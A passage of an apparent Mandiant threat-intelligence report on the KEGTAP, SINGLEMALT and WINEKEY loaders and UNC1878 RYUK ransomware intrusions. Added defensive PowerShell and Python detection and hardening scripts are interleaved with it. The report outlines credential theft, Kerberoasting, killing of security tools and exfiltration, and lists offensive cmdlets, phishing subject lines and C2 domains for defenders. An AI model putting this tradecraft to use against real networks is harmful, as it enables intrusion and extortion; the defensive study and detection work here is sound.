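    hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
    fan_out = any(h in FAN_OUT_RULES for h in hits)
    other = any(h not in FAN_OUT_RULES for h in hits)
    if fan_out and other:
        severity = "high"      # mass remote execution plus credentials or staging
    elif hits:
        severity = "medium"    # a single observable on its own
    else:
        severity = "none"
    return Finding(cmdline, hits, severity,
                   host_list_file(cmdline) if fan_out else None)


def triage(cmdlines: List[str]) -> List[Finding]:
    """Analyze a batch of command lines, preserving order."""
    return [analyze(c) for c in cmdlines]


if __name__ == "__main__":
    for f in triage(SAMPLE_COMMAND_LINES):
        print(f"{f.severity:6} {f.rules} targets={f.host_list_file}")
```

Feed it command lines from Sysmon Event ID 1 or Windows Security Event 4688 exports; the @file path it extracts is what to pull first when scoping which hosts received the encryptor.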

        Detecting the Techniques

        FireEye detects this activity across our platforms. The following table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

        Platform: Endpoint Security (signature names)

        • KEGTAP INTERACTIVE CMD.EXE CHILD PROCESS (BACKDOOR)
        • KEGTAP DLL EXECUTION VIA RUNDLL32.EXE (BACKDOOR)
        • SINGLEMALT (DOWNLOADER)
        • STILLBOT (BACKDOOR)
        • WINEKEY (DOWNLOADER)
        • CORKBOT (BACKDOOR)
        • RYUK RANSOMWARE ENCRYPT COMMAND (FAMILY)
        • RYUK RANSOMWARE SETUP EXECUTION (FAMILY)
        • RYUK RANSOMWARE WAKE-ON-LAN EXECUTION (FAMILY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER TARGET (UTILITY)
        • RYUK RANSOMWARE ENCRYPTOR DISTRIBUTION SCRIPT CREATION (UTILITY)
        • RYUK RANSOMWARE STAGED ENCRYPTOR INTERNAL TRANSFER SOURCE (UTILITY)

        Platform: Network Security and Email Security (signature names)

        • Downloader.Win.KEGTAP
        • Trojan.KEGTAP
        • APTFIN.Backdoor.Win.BEERBOT
        • APTFIN.Downloader.Win.SINGLEMALT
        • APTFIN.Backdoor.Win.STILLBOT
        • APTFIN.Downloader.Win.WINEKEY
        • APTFIN.Backdoor.Win.CORKBOT
        • FE_Downloader_Win64_KEGTAP
        • FE_APTFIN_Backdoor_Win32_BEERBOT
        • FE_APTFIN_Backdoor_Win_BEERBOT
        • FE_APTFIN_Downloader_Win32_SINGLEMALT
        • FE_APTFIN_Downloader_Win64_SINGLEMALT
        • FE_APTFIN_Backdoor_Win_STILLBOT
        • FE_APTFIN_Downloader_Win_WINEKEY
        • FE_APTFIN_Backdoor_Win_CORKBOT

        Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser

        Throughout 2020, ransomware activity has become increasingly prolific, relying on an ecosystem of distinct but co-enabling operations to gain access to targets of interest before conducting extortion. Mandiant Threat Intelligence has tracked several loader and backdoor campaigns that lead to the post-compromise deployment of ransomware, sometimes within 24 hours of initial compromise. Effective and fast detection of these campaigns is key to mitigating this threat.

        The malware families enabling these attacks previously reported by Mandiant to intelligence subscribers include KEGTAP/BEERBOT, SINGLEMALT/STILLBOT and WINEKEY/CORKBOT. While these malware families communicate with the same command and control infrastructure (C2) and are close to functional parity, there are minimal code overlaps across them. Other security researchers have tracked these malware families under the names BazarLoader and BazarBackdoor or Team9.

        The operators conducting these campaigns have actively targeted hospitals, retirement communities, and medical centers, even in the midst of a global health crisis, demonstrating a clear disregard for human life.

        Email Campaign TTPs

        Campaigns distributing KEGTAP, SINGLEMALT and WINEKEY have been sent to individuals at organizations across a broad range of industries and geographies using a series of shifting delivery tactics, techniques and procedures (TTPs). Despite the frequent changes seen across these campaigns, the following has remained consistent across recent activity:

        • Emails contain an in-line link to an actor-controlled Google Docs document, typically a PDF file.
        • This document contains an in-line link to a URL hosting a malware payload.
        • Emails masquerade as generic corporate communications, including follow-ups about documents and phone calls or emails crafted to appear related to complaints, terminations, bonuses, contracts, working schedules, surveys or queries about business hours.
        • Some email communications have included the recipient’s name or employer name in the subject line and/or email body.

        Despite this uniformity, the associated TTPs have otherwise changed regularly—both between campaigns and across multiple spam runs seen in the same day. Notable ways that these campaigns have varied over time include:

        • Early campaigns were delivered via Sendgrid and included in-line links to Sendgrid URLs that would redirect users to attacker-created Google documents. In contrast, recent campaigns have been delivered via attacker-controlled or compromised email infrastructure and have commonly contained in-line links to attacker-created Google documents, although they have also used links associated with the Constant Contact service.
        • The documents loaded by these in-line links are crafted to appear somewhat relevant to the theme of the email campaign and contain additional links along with instructions directing users to click on them. When clicked, these links download malware binaries with file names masquerading as document files. Across earlier campaigns these malware binaries were hosted on compromised infrastructure; however, the attackers have since shifted to hosting their malware on legitimate web services, including Google Drive, Basecamp, Slack, Trello, Yougile, and JetBrains.
        • In recent campaigns, the malware payloads have been hosted on numerous URLs associated with one or more of these legitimate services. In cases where the payloads have been taken down, the actors have sometimes updated their Google documents to contain new, working links.
        • Some campaigns have also incorporated customization, including emails with internal references to the recipients’ organizations (Figure 1) and organizations’ logos embedded into the Google Docs documents (Figure 2).


        Figure 1: Email containing internal references to target an organization’s name


        Figure 2: Google Docs PDF document containing a target organization’s logo

        Hiding the final payload behind multiple links is a simple yet effective way to bypass some email filtering technologies. Various technologies have the ability to follow links in an email to try to identify malware or malicious domains; however, the number of links followed can vary. Additionally, embedding links within a PDF document further makes automated detection and link-following difficult.

        Post-Compromise TTPs

        Given the possibility that accesses obtained from these campaigns may be provided to various operators to monetize, the latter-stage TTPs, including the ransomware family deployed, may vary across intrusions. A notable majority of cases where Mandiant has had visibility into these post-compromise TTPs have been attributable to UNC1878, a financially motivated actor that monetizes network access via the deployment of RYUK ransomware.

        Establish Foothold

        Once the loader and backdoor have been executed on the initial victim host, the actors have used this initial backdoor to download POWERTRICK and/or Cobalt Strike BEACON payloads to establish a foothold. Notably, the respective loader and backdoor as well as POWERTRICK have typically been installed on a small number of hosts in observed incidents, suggesting these payloads may be reserved for establishing a foothold and performing initial network and host reconnaissance. However, BEACON is frequently found on a larger number of hosts and used throughout various stages of the attack lifecycle.

        Maintain Presence

        Beyond the preliminary phases of each intrusion, we have seen variations in how these attackers have maintained presence after establishing an initial foothold or moving laterally within a network. In addition to the use of common post-exploitation frameworks such as Cobalt Strike, Metasploit and EMPIRE, we have observed the use of other backdoors, including ANCHOR, that we also believe to be under the control of the actors behind TrickBot.

        • The loaders associated with this activity can maintain persistence through reboot by using at least four different techniques, including creating a scheduled task, adding themselves to the startup folder as a shortcut, creating a scheduled Microsoft BITS job using /setnotifycmdline, and adding themselves to the Userinit value under the following registry key:
          • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
        • Actors have downloaded POWERTRICK, Metasploit Meterpreter, and Cobalt Strike BEACON payloads following the initial compromise. BEACON payloads have commonly been executed after moving laterally to new hosts within the victim network. The attackers have employed Cobalt Strike payloads crafted to maintain persistence through reboot via a scheduled task on critical systems in victim environments. Notably, BEACON is the backdoor observed most frequently across these incidents.
        • We have observed actors executing encoded PowerShell commands that ultimately executed instances of the PowerShell EMPIRE backdoor.
        • The actors were observed using BEACON to execute PowerLurk's Register-MaliciousWmiEvent cmdlet to register WMI events used to kill processes related to security tools and utilities, including Task Manager, WireShark, TCPView, ProcDump, Process Explorer, Process Monitor, NetStat, PSLoggedOn, LogonSessions, Process Hacker, Autoruns, AutorunsSC, RegEdit, and RegShot.
        • In at least one case, attackers have maintained access to a victim environment using stolen credentials to access corporate VPN infrastructure configured to require only single-factor authentication.

        Escalate Privileges

        The most commonly observed methods for escalating privileges in these incidents have involved the use of valid credentials. The actors used a variety of techniques to obtain credentials stored in memory or on disk and then used them to access privileged accounts.

        • The actors used valid credentials obtained using Mimikatz variants to escalate privileges. We’ve observed Mimikatz being executed both from the file system of victim hosts and through PowerShell cmdlets run via Cobalt Strike BEACON.
        • Actors have gained access to credentials via exported copies of the ntds.dit Active Directory database and the SYSTEM and SECURITY registry hives from a Domain Controller.
        • In multiple instances, the actors have launched attacks against Kerberos, including the use of RUBEUS, the Mimikatz Kerberos module, and the Invoke-Kerberoast cmdlet.

        Reconnaissance

        The approaches taken to perform host and network reconnaissance across these incidents varied; however, a significant portion of observed reconnaissance activity has revolved around Active Directory enumeration using publicly available utilities such as BLOODHOUND, SHARPHOUND or ADFind, as well as the execution of PowerShell cmdlets using Cobalt Strike BEACON.

        • BEACON has been installed on a large number of systems across these intrusions and has been used to execute various reconnaissance commands including both built-in host commands and PowerShell cmdlets. Observed PowerShell cmdlets include:
          • Get-GPPPassword
          • Invoke-AllChecks
          • Invoke-BloodHound
          • Invoke-EternalBlue
          • Invoke-FileFinder
          • Invoke-HostRecon
          • Invoke-Inveigh
          • Invoke-Kerberoast
          • Invoke-LoginPrompt
          • Invoke-mimikittenz
          • Invoke-ShareFinder
          • Invoke-UserHunter
        • Mandiant has observed actors using POWERTRICK to execute built-in system commands on the initial victim host, including ipconfig, findstr, and cmd.exe.
        • The actors leveraged the publicly available utilities ADFind, BLOODHOUND, SHARPHOUND, and KERBRUTE on victim networks to collect Active Directory information and credentials.
        • WMIC commands have been used to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture.
        • The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to res.txt.
        • The actors used the Nltest command to list domain controllers.

        Lateral Movement

        Lateral movement was most commonly accomplished using valid credentials in combination with Cobalt Strike BEACON, RDP and SMB, or using the same backdoors used to establish a foothold in victim networks.

        • The actors have regularly leveraged Cobalt Strike BEACON and Metasploit Meterpreter to move laterally within victim environments. 
        • The actors commonly moved laterally within victim environments using compromised accounts—both those belonging to regular users and accounts with administrative privileges. In addition to the use of common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP and SMB protocols. 
        • The actors used the Windows net use command to connect to Windows admin shares to move laterally.

        Complete Mission

        Mandiant is directly aware of incidents involving KEGTAP that included the post-compromise deployment of RYUK ransomware. We have also observed instances where ANCHOR infections, another backdoor associated with the same actors, preceded CONTI or MAZE deployment.

        • In at least one case, an executable was observed that was designed to exfiltrate files via SFTP to an attacker-controlled server.
        • The actors have used Cobalt Strike BEACON to exfiltrate data created through network reconnaissance activities as well as user files.
        • The actors were observed deleting their tools from victim hosts in an attempt to remove indicators of compromise.
        • The actors have used their access to the victim network to deploy ransomware payloads. There is evidence to suggest that RYUK ransomware was likely deployed via PsExec, but other scripts or artifacts related to the distribution process were not available for forensic analysis.

        Hunting Strategies

        If an organization identifies a host with an active infection believed to be an instance of KEGTAP or a parallel malware family, the following containment actions are recommended. Note that due to the velocity of this intrusion activity, these actions should be taken in parallel.

        • Isolate and perform a forensic review of any impacted systems.
        • Review incoming emails to the user that owns the impacted device for emails matching the distribution campaigns, and take action to remove the messages from all mailboxes.
        • Identify the URLs used by the phishing campaign and block them using proxy or network security devices.
        • Reset credentials for any user accounts associated with execution of the malware.
        • Perform an enterprise wide review for lateral movement authentication from the impacted systems.
        • Check authentication logs from any single-factor remote access solutions that may exist (VPN, VDI, etc.) and move towards multi-factor authentication (MFA) as soon as possible.

        An enterprise-wide effort should be made to identify host-based artifacts related to the execution of first-stage malware and all post-intrusion activity associated with this activity. Some baseline approaches to this have been captured as follows.

        Activity associated with the KEGTAP loader can often be identified via a review of system startup folders and Userinit values under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon registry key.

        %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adobe.lnk

        Figure 3: Example LNK file associated with KEGTAP persistence within a system’s startup folders

        SINGLEMALT employs BITS to maintain persistence through reboot and can often be identified via a review of anomalous BITS jobs. SINGLEMALT uses a well-documented BITS persistence mechanism that intentionally creates a job to download a non-existent URL, which triggers a failure event. The job is set to retry on a regular interval, thus ensuring the malware continues to run. To review the BITS jobs on a host, run the command bitsadmin /list. Jobs created by this mechanism commonly show the following properties:

        • Display name may be “Adobe Update”, “System autoupdate” or another generic value.
        • Notify state may be set to Fail (Status 2).
        • FileList URL value may be set to the local host or a URL that does not exist.
        • The Notification Command Line value may contain the path to the SINGLEMALT sample and/or a command to move it to a new location then start it.
        • The Retry Delay value will be set.

        WINEKEY maintains persistence through reboot via the use of registry RUN keys. Searching for anomalous RUN keys enterprise-wide can help to identify systems impacted by this malware.

        Key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Backup Mgr

        Value: Path to the backdoor

        Figure 4: Example registry RUN key used by WINEKEY to maintain persistence

        The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case.

        • Named scheduled tasks associated with ANCHOR persistence typically follow the pattern <Random directory within %APPDATA%> autoupdate#<random number>.
        • All unnamed scheduled tasks should be reviewed, particularly those with a creation date consistent with the time of the suspected compromise.

        Although it is a low fidelity indicator, ANCHOR activity may also sometimes be identified by searching for binaries within the C:\Windows\SysWOW64 directory that have a file name matching the following pattern: <8 random lowercase chars>.exe. Stacking or sorting on file creation timestamps in the C:\Windows\SysWOW64 directory may also help identify malicious files, as the directory should be mostly static.

        Post-exploitation activity associated with the deployment of ransomware following these campaigns is typically conducted using the Cobalt Strike attack framework. The BEACON payload associated with Cobalt Strike can often be identified via a review of existing registered services and service creation events (Event ID 7045), both markers of the mechanism it most commonly employs to maintain persistence.
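A host-triage script for the artifacts described in this section, added here as an example and not code from the Mandiant post. It collects the Winlogon Userinit value and Startup-folder shortcuts (KEGTAP), BITS jobs carrying a notification command line (SINGLEMALT), per-user Run values (WINEKEY), unnamed or autoupdate# scheduled tasks and 8-letter SysWOW64 binaries (ANCHOR), and recent Event ID 7045 service installations (BEACON) into one review list. It assumes a Windows 8 / Server 2012 or later host with the BitsTransfer and ScheduledTasks modules, treats GUID-style task names as the "unnamed" tasks the post describes, and uses an assumed 30-day window for service installs.

```powershell
# Added host-triage script; not code from the Mandiant post. Run in an elevated
# PowerShell session on the suspect host. Every hit is a review lead, not a verdict.
$findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Family, [string]$Artifact, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Family = $Family; Artifact = $Artifact; Detail = $Detail })
}

# 1. KEGTAP: Winlogon\Userinit should hold only the default userinit.exe entry
#    (default path assumed to be %SystemRoot%\system32\userinit.exe).
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$userinit = (Get-ItemProperty -Path $winlogon -Name Userinit).Userinit
foreach ($entry in ($userinit -split ',' | ForEach-Object { $_.Trim() } | Where-Object { $_ })) {
    if ($entry.ToLower() -ne "$env:SystemRoot\system32\userinit.exe".ToLower()) {
        Add-Finding 'KEGTAP' 'Winlogon\Userinit extra entry' $entry
    }
}

# 1b. KEGTAP: LNK files in the all-users Startup folder and every profile's
#     Startup folder (the post's example is adobe.lnk), with the resolved target.
$shell = New-Object -ComObject WScript.Shell
$startupDirs = @("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup")
$startupDirs += Get-ChildItem 'C:\Users' -Directory | ForEach-Object {
    Join-Path $_.FullName 'AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
}
foreach ($dir in $startupDirs) {
    Get-ChildItem -Path $dir -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        Add-Finding 'KEGTAP' "Startup LNK $($_.FullName)" "$($lnk.TargetPath) $($lnk.Arguments)"
    }
}

# 2. SINGLEMALT: BITS jobs with a notification command line or a FileList URL
#    pointing at the local host (equivalent to bitsadmin /list /allusers /verbose).
Import-Module BitsTransfer -ErrorAction SilentlyContinue
Get-BitsTransfer -AllUsers -ErrorAction SilentlyContinue | ForEach-Object {
    $job = $_
    $urls = ($job.FileList | ForEach-Object { $_.RemoteName }) -join ' '
    if ($job.NotifyCmdLine -or $urls -match 'localhost|127\.0\.0\.1') {
        Add-Finding 'SINGLEMALT' "BITS job '$($job.DisplayName)' state=$($job.JobState)" `
            "NotifyCmdLine=[$($job.NotifyCmdLine)] RetryDelay=$($job.MinimumRetryDelay)s Files=$urls"
    }
}

# 3. WINEKEY: every Run value in each loaded user hive (the post's example is a
#    value named 'Backup Mgr'). All values are listed so odd names or paths stand out.
Get-ChildItem Registry::HKEY_USERS -ErrorAction SilentlyContinue | ForEach-Object {
    $sid = $_.PSChildName
    $runKey = "Registry::HKEY_USERS\$sid\Software\Microsoft\Windows\CurrentVersion\Run"
    if (Test-Path $runKey) {
        $values = Get-ItemProperty -Path $runKey
        $values.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' } | ForEach-Object {
            Add-Finding 'WINEKEY' "Run value '$($_.Name)' in $sid" $_.Value
        }
    }
}

# 4. ANCHOR: tasks with no real name (registered without a name they surface as
#    a GUID-style name) or matching '<dir> autoupdate#<n>', with date and actions.
Get-ScheduledTask -ErrorAction SilentlyContinue | Where-Object {
    $_.TaskName -match '^\{[0-9a-f-]{36}\}$' -or $_.TaskName -match 'autoupdate#\d+'
} | ForEach-Object {
    $task = $_
    $actions = ($task.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
    Add-Finding 'ANCHOR' "Task $($task.TaskPath)$($task.TaskName) registered $($task.Date)" $actions
}

# 5. ANCHOR (low fidelity): 8-lowercase-letter .exe names in SysWOW64, newest first.
Get-ChildItem "$env:SystemRoot\SysWOW64" -Filter *.exe -ErrorAction SilentlyContinue |
    Where-Object { $_.Name -cmatch '^[a-z]{8}\.exe$' } |
    Sort-Object CreationTime -Descending | ForEach-Object {
        Add-Finding 'ANCHOR' "SysWOW64\$($_.Name)" "created $($_.CreationTime)"
    }

# 6. BEACON: service installations (System log, Event ID 7045) in the window.
#    EventData order: ServiceName, ImagePath, ServiceType, StartType, AccountName.
$since = (Get-Date).AddDays(-30)   # assumed review window
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = $since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        $p = $_.Properties
        Add-Finding 'BEACON' "Service '$($p[0].Value)' installed $($_.TimeCreated)" `
            "$($p[1].Value) (start=$($p[3].Value), account=$($p[4].Value))"
    }

$findings | Sort-Object Family | Format-Table -AutoSize -Wrap
```

Legitimate software also uses Startup shortcuts, Run values and services, so compare the list against a known-good baseline host or the organisation's software inventory rather than treating every row as malicious.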

        The following are additional strategies that may aid in identifying associated activity:

        • Organizations can review web proxy logs in order to identify HTTP requests for file storage, project management, collaboration or communication services with a referrer from a Google Docs document.
        • During the associated post-compromise activity, attackers have commonly staged their tools and data in the PerfLogs directory and C$ share.
        • While collecting data used to enable later-stage operations, the attackers commonly leave instances of ntds.dit and exports of the SYSTEM and SECURITY registry hives on impacted systems.
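The proxy-log strategy above, worked as an added example (not code from the Mandiant post): it flags requests to file-storage or collaboration services whose Referer is a Google Docs document, i.e. the Google Docs link to payload-hosting service chain described in the email campaign section. The space-separated log layout (time, client, method, URL, referer) and the destination host names for the services the post names are assumptions to be mapped onto your proxy's export.

```powershell
# Added example, not from the Mandiant post. Assumed log layout per line:
#   <time> <client-ip> <method> <url> <referer>   ('-' when no Referer was sent)
# Host names below are assumptions for the services the post lists as payload hosts.
$storageHosts = @(
    'drive.google.com', 'basecamp.com', 'slack.com', 'trello.com',
    'yougile.com', 'jetbrains.com'
)

function Get-HostFromUrl([string]$Url) {
    # Returns the lower-cased host of an absolute URL, or '' for '-' / garbage.
    try { return ([uri]$Url).Host.ToLower() } catch { return '' }
}

function Find-DocLinkedDownload([string[]]$Lines) {
    foreach ($line in $Lines) {
        $f = $line -split '\s+'
        if ($f.Count -lt 5) { continue }
        $time, $client, $method, $url, $referer = $f[0..4]
        $dst = Get-HostFromUrl $url
        $ref = Get-HostFromUrl $referer
        # Chain of interest: Referer is a Google Docs document AND the request
        # goes to one of the storage/collaboration services (exact host or subdomain).
        $fromDocs  = ($ref -eq 'docs.google.com')
        $toStorage = $storageHosts | Where-Object { $dst -eq $_ -or $dst.EndsWith(".$_") }
        if ($fromDocs -and $toStorage) {
            [pscustomobject]@{ Time = $time; Client = $client; Destination = $dst; Url = $url }
        }
    }
}

# Constructed sample lines (placeholder IDs, no real URLs): only the second
# line follows the Google Docs -> storage-service pattern.
$sample = @(
    '2020-10-28T14:02:11Z 10.1.2.3 GET https://www.example.com/news https://www.google.com/',
    '2020-10-28T14:03:40Z 10.1.2.3 GET https://files.slack.com/files-pri/T000-F000/Document_Preview.exe https://docs.google.com/document/d/EXAMPLE_DOC_ID/edit',
    '2020-10-28T14:05:02Z 10.1.2.9 GET https://drive.google.com/uc?id=EXAMPLE_FILE_ID -'
)
Find-DocLinkedDownload $sample | Format-Table -AutoSize
```

Each hit identifies a client and a download URL to pivot on: check the client for the first-stage artifacts above, and submit the URL to the proxy block list recommended in the containment steps.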

        Hardening Strategies

        The actions taken by the actors to escalate privileges and move laterally in an environment use well-documented techniques that search the network and Active Directory for common misconfigurations that expose credentials and systems for abuse. Organizations can take steps to limit the impact and effectiveness of these techniques. For more in-depth recommendations see our ransomware protection white paper.

        • Harden service accounts against brute force and password guessing attacks. Most organizations have at least a few service accounts with passwords set to never expire. These passwords are likely old and insecure. Make a best effort to reset as many of these accounts as possible to long and complex passwords. In cases where it is possible, migrate to MSAs and gMSAs for automated rotation.
        • Prevent the usage of privileged accounts for lateral movement. Use GPOs to restrict privileged accounts such as Domain Administrators and privileged service accounts from initiating RDP connections and network logins. Actors often pick just a few accounts to use for RDP; by limiting the number of potential accounts, you provide detection opportunities and opportunities to slow the actor.
        • Block internet access for servers where possible. Often there is no business need for servers, especially AD infrastructure systems, to access the Internet. The actors often choose high-uptime servers for the deployment of post-exploitation tools such as BEACON.
        • Block uncategorized and newly registered domains using web proxies or DNS filters. Often the final payload delivered via phishing is hosted on a compromised third-party website that does not have a business categorization.
        • Ensure that critical patches are installed on Windows systems as well as network infrastructure. We have observed attackers exploiting well-known vulnerabilities such as Zerologon (CVE-2020-1472) to escalate privileges in an environment prior to deploying ransomware. In other cases, possibly unrelated to UNC1878, we have observed threat actors gain access to an environment through vulnerable VPN infrastructure before deploying ransomware.
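A starting point for the first two hardening bullets, added here as an example and not code from the Mandiant post: it lists enabled accounts whose password never expires and has not been set within a threshold (likely service accounts; a registered SPN marks the ones exposed to Kerberoasting), the gMSAs that already exist, and the Domain Admins membership that the RDP and network-logon restrictions should cover. It assumes the RSAT ActiveDirectory module and a 365-day password-age threshold.

```powershell
# Added example, not from the Mandiant post. Requires the RSAT ActiveDirectory
# module and read access to the domain. The threshold is an assumption.
Import-Module ActiveDirectory
$maxPasswordAgeDays = 365
$cutoff = (Get-Date).AddDays(-$maxPasswordAgeDays)

function Get-StaleNeverExpiringAccount {
    # Enabled accounts with PasswordNeverExpires whose password is older than the
    # cutoff (or never set). HasSPN = $true means the account can be Kerberoasted.
    Get-ADUser -Filter 'Enabled -eq $true -and PasswordNeverExpires -eq $true' `
        -Properties PasswordLastSet, ServicePrincipalName, LastLogonDate |
        Where-Object { -not $_.PasswordLastSet -or $_.PasswordLastSet -lt $cutoff } |
        Select-Object SamAccountName, PasswordLastSet, LastLogonDate,
            @{ Name = 'HasSPN'; Expression = { [bool]$_.ServicePrincipalName } } |
        Sort-Object PasswordLastSet
}

function Get-ManagedServiceAccountSummary {
    # gMSAs rotate their own passwords; accounts in the stale list that could be
    # converted are migration candidates.
    Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword |
        Select-Object Name, Enabled, PrincipalsAllowedToRetrieveManagedPassword
}

function Get-PrivilegedLogonCandidate {
    # Principals the GPO user-rights restrictions ("Deny log on through Remote
    # Desktop Services", "Deny access to this computer from the network") should
    # cover on workstations and ordinary servers.
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Select-Object SamAccountName, objectClass, distinguishedName
}

Write-Host "== Enabled accounts, password never expires, last set before $($cutoff.ToShortDateString()) =="
Get-StaleNeverExpiringAccount | Format-Table -AutoSize
Write-Host '== Existing group managed service accounts =='
Get-ManagedServiceAccountSummary | Format-Table -AutoSize
Write-Host '== Domain Admins (recursive) to restrict from RDP and network logon =='
Get-PrivilegedLogonCandidate | Format-Table -AutoSize
```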

        For more intelligence on ransomware and other threats, please register for Mandiant Advantage Free, a no-cost version of our threat intelligence platform. Check out this episode of State of the Hack for additional information on this threat.

        Campaign Indicators

        Sample Email Subjects / Patterns

        • <(first|last)-name>: Important Information
        • <Company Name>
        • <Company Name> complaint
        • <(first|last)-name>
        • Agreement cancellation message
        • Agreement cancellation notice
        • Agreement cancellation notification
        • Agreement cancellation reminder
        • Agreement suspension message
        • Agreement suspension notice
        • Agreement suspension notification
        • Agreement suspension reminder
        • Arrangement cancellation message
        • Arrangement cancellation notice
        • Arrangement cancellation notification
        • Arrangement cancellation reminder
        • Arrangement suspension message
        • Arrangement suspension notice
        • Arrangement suspension notification
        • Arrangement suspension reminder
        • Contract cancellation message
        • Contract cancellation notice
        • Contract cancellation notification
        • Contract cancellation reminder
        • Contract suspension message
        • Contract suspension notice
        • Contract suspension notification
        • Contract suspension reminder
        • debit confirmation
        • FW: <Name> Annual Bonus Report is Ready
        • FW: Urgent: <Company Name>: A Customer Complaint Request – Prompt Action Required
        • RE: <(first|last)-name>
        • RE: <(first|last)-name>: Your Payslip for October
        • RE: <Company Name> - my visit
        • RE: <Company Name> Employee Survey
        • RE: <Company Name> office
        • RE: <Name> about complaint
        • RE: <Name> bonus
        • RE: <Name> termination list
        • RE: <Name>
        • RE: <(first|last)-name> <(first|last)-name>: complaint
        • RE: <(first|last)-name>: Subpoena
        • RE: <(first|last)-name>: Your Payslip for September
        • RE: about complaint
        • RE: Adopted Filer Forms
        • RE: Business hours adjustment
        • RE: Business hours realignment
        • RE: Business hours rearrangement
        • RE: Business hours restructuring
        • RE: Business schedule adjustment
        • RE: Business schedule realignment
        • RE: Business schedule rearrangement
        • RE: Business schedule restructuring
        • RE: call me
        • RE: changes
        • RE: complaint
        • RE: Complaint in <Company Name>.
        • RE: Complaint on <Name>
        • RE: customer request
        • RE: debit confirmation
        • RE: document copy
        • RE: documents list
        • RE: Edgar Filer forms renovations
        • RE: employee bonuses
        • RE: Filer Forms adaptations
        • RE: my call
        • RE: New filer form types
        • RE: office
        • RE: our meeting
        • RE: Payroll Register
        • RE: report confirmation
        • RE: situation
        • RE: Subpoena
        • RE: termination
        • RE: till 2 pm
        • RE: Urgent <Company Name> Employee Internal Survey
        • RE: visit
        • RE: what about your opinion?
        • RE: what time?
        • RE: why
        • RE: why this debit
        • RE: Working schedule adjustment
        • RE: Working schedule realignment
        • RE: Working schedule rearrangement
        • RE: Working schedule restructuring
        • RE: Your Payslip for September

        Example Malware Family MD5s

        • KEGTAP
          • df00d1192451268c31c1f8568d1ff472
        • BEERBOT
          • 6c6a2bfa5846fab374b2b97e65095ec9
        • SINGLEMALT
          • 37aa5690094cb6d638d0f13851be4246
        • STILLBOT
          • 3176c4a2755ae00f4fffe079608c7b25
        • WINEKEY
          • 9301564bdd572b0773f105287d8837c4
        • CORKBOT
          • 0796f1c1ea0a142fc1eb7109a44c86cb

        Code Signing Certificate CNs

        • ARTBUD RADOM SP Z O O
        • BESPOKE SOFTWARE SOLUTIONS LIMITED
        • Best Fud, OOO
        • BlueMarble GmbH
        • CHOO FSP, LLC
        • Company Megacom SP Z O O
        • ESTELLA, OOO
        • EXON RENTAL SP Z O O
        • Geksan LLC
        • GLOBAL PARK HORIZON SP Z O O
        • Infinite Programming Limited
        • James LTH d.o.o.
        • Logika OOO
        • MADAS d.o.o.
        • MUSTER PLUS SP Z O O
        • NEEDCODE SP Z O O
        • Nordkod LLC
        • NOSOV SP Z O O
        • OOO MEP
        • PLAN CORP PTY LTD
        • REGION TOURISM LLC
        • RESURS-RM OOO
        • Retalit LLC
        • Rumikon LLC
        • SNAB-RESURS, OOO
        • TARAT d.o.o.
        • TES LOGISTIKA d.o.o.
        • VAS CO PTY LTD
        • VB CORPORATE PTY. LTD.
        • VITA-DE d.o.o.

        UNC1878 Indicators

        A significant proportion of the post-compromise activity associated with these campaigns has involved the distribution of RYUK ransomware by a threat group tracked by Mandiant as UNC1878. As such, we are releasing indicators associated with this group.

        BEACON C2s

        First Seen

        Domain

        12/11/19

        updatemanagir[.]us

        12/20/19

        cmdupdatewin[.]com

        12/26/19

        scrservallinst[.]info

        1/10/20

        winsystemupdate[.]com

        1/11/20

        jomamba[.]best

        1/13/20

        updatewinlsass[.]com

        1/16/20

        winsysteminfo[.]com

        1/20/20

        livecheckpointsrs[.]com

        1/21/20

        ciscocheckapi[.]com

        1/28/20

        timesshifts[.]com

        1/29/20

        cylenceprotect[.]com

        1/30/20

        sophosdefence[.]com

        1/30/20

        taskshedulewin[.]com

        1/30/20

        windefenceinfo[.]com

        1/30/20

        lsasswininfo[.]com

        1/30/20

        update-wind[.]com

        1/30/20

        lsassupdate[.]com

        1/30/20

        renovatesystem[.]com

        1/31/20

        updatewinsoftr[.]com

        2/2/20

        cleardefencewin[.]com

        2/2/20

        checkwinupdate[.]com

        2/2/20

        havesetup[.]net

        2/3/20

        update-wins[.]com

        2/3/20

        conhostservice[.]com

        2/4/20

        microsoftupdateswin[.]com

        2/4/20

        iexploreservice[.]com

        2/12/20

        avrenew[.]com

        2/12/20

        target-support[.]online

        2/12/20

        web-analysis[.]live

        2/14/20

        freeallsafe[.]com

        2/17/20

        windefens[.]com

        2/17/20

        defenswin[.]com

        2/17/20

        easytus[.]com

        2/17/20

        greattus[.]com

        2/17/20

        livetus[.]com

        2/17/20

        comssite[.]com

        2/17/20

        findtus[.]com

        2/17/20

        bigtus[.]com

        2/17/20

        aaatus[.]com

        2/17/20

        besttus[.]com

        2/17/20

        firsttus[.]com

        2/17/20

        worldtus[.]com

        2/26/20

        freeoldsafe[.]com

        2/26/20

        serviceupdates[.]net

